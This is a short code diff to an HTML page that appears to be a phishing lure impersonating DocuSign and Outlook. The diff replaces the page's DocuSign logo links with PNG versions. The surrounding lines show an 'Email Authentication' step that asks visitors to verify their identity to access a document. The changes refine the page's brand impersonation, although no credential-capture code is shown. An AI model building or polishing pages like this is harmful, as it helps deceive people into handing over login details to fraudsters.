--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <link rel="icon" type="image/svg" href="https://upload.wikimedia.org/wikipedia/commons/e/e3/Docusign_Full_Color.svg">
+    <link rel="icon" type="image/svg" href="https://upload.wikimedia.org/wikipedia/commons/thumb/e/e3/Docusign_Full_Color.svg/2560px-Docusign_Full_Color.svg.png">
     <title>DocuSign</title>
     <style>
         body { 
@@ -69,7 +69,7 @@
 
     <!-- Outlook Authentication Page -->
     <div id="auth-page" class="container">
-        <img src="https://upload.wikimedia.org/wikipedia/commons/e/e3/Docusign_Full_Color.svg" alt="Outlook Logo" class="logo"><br>
+        <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/e/e3/Docusign_Full_Color.svg/2560px-Docusign_Full_Color.svg.png" alt="Outlook Logo" class="logo"><br>
         <p><b>Email Authentication</b></p>
         <p>To access this document, you will need to verify your identity.</p>
         <p>Please ensure you input the correct email </p><br>
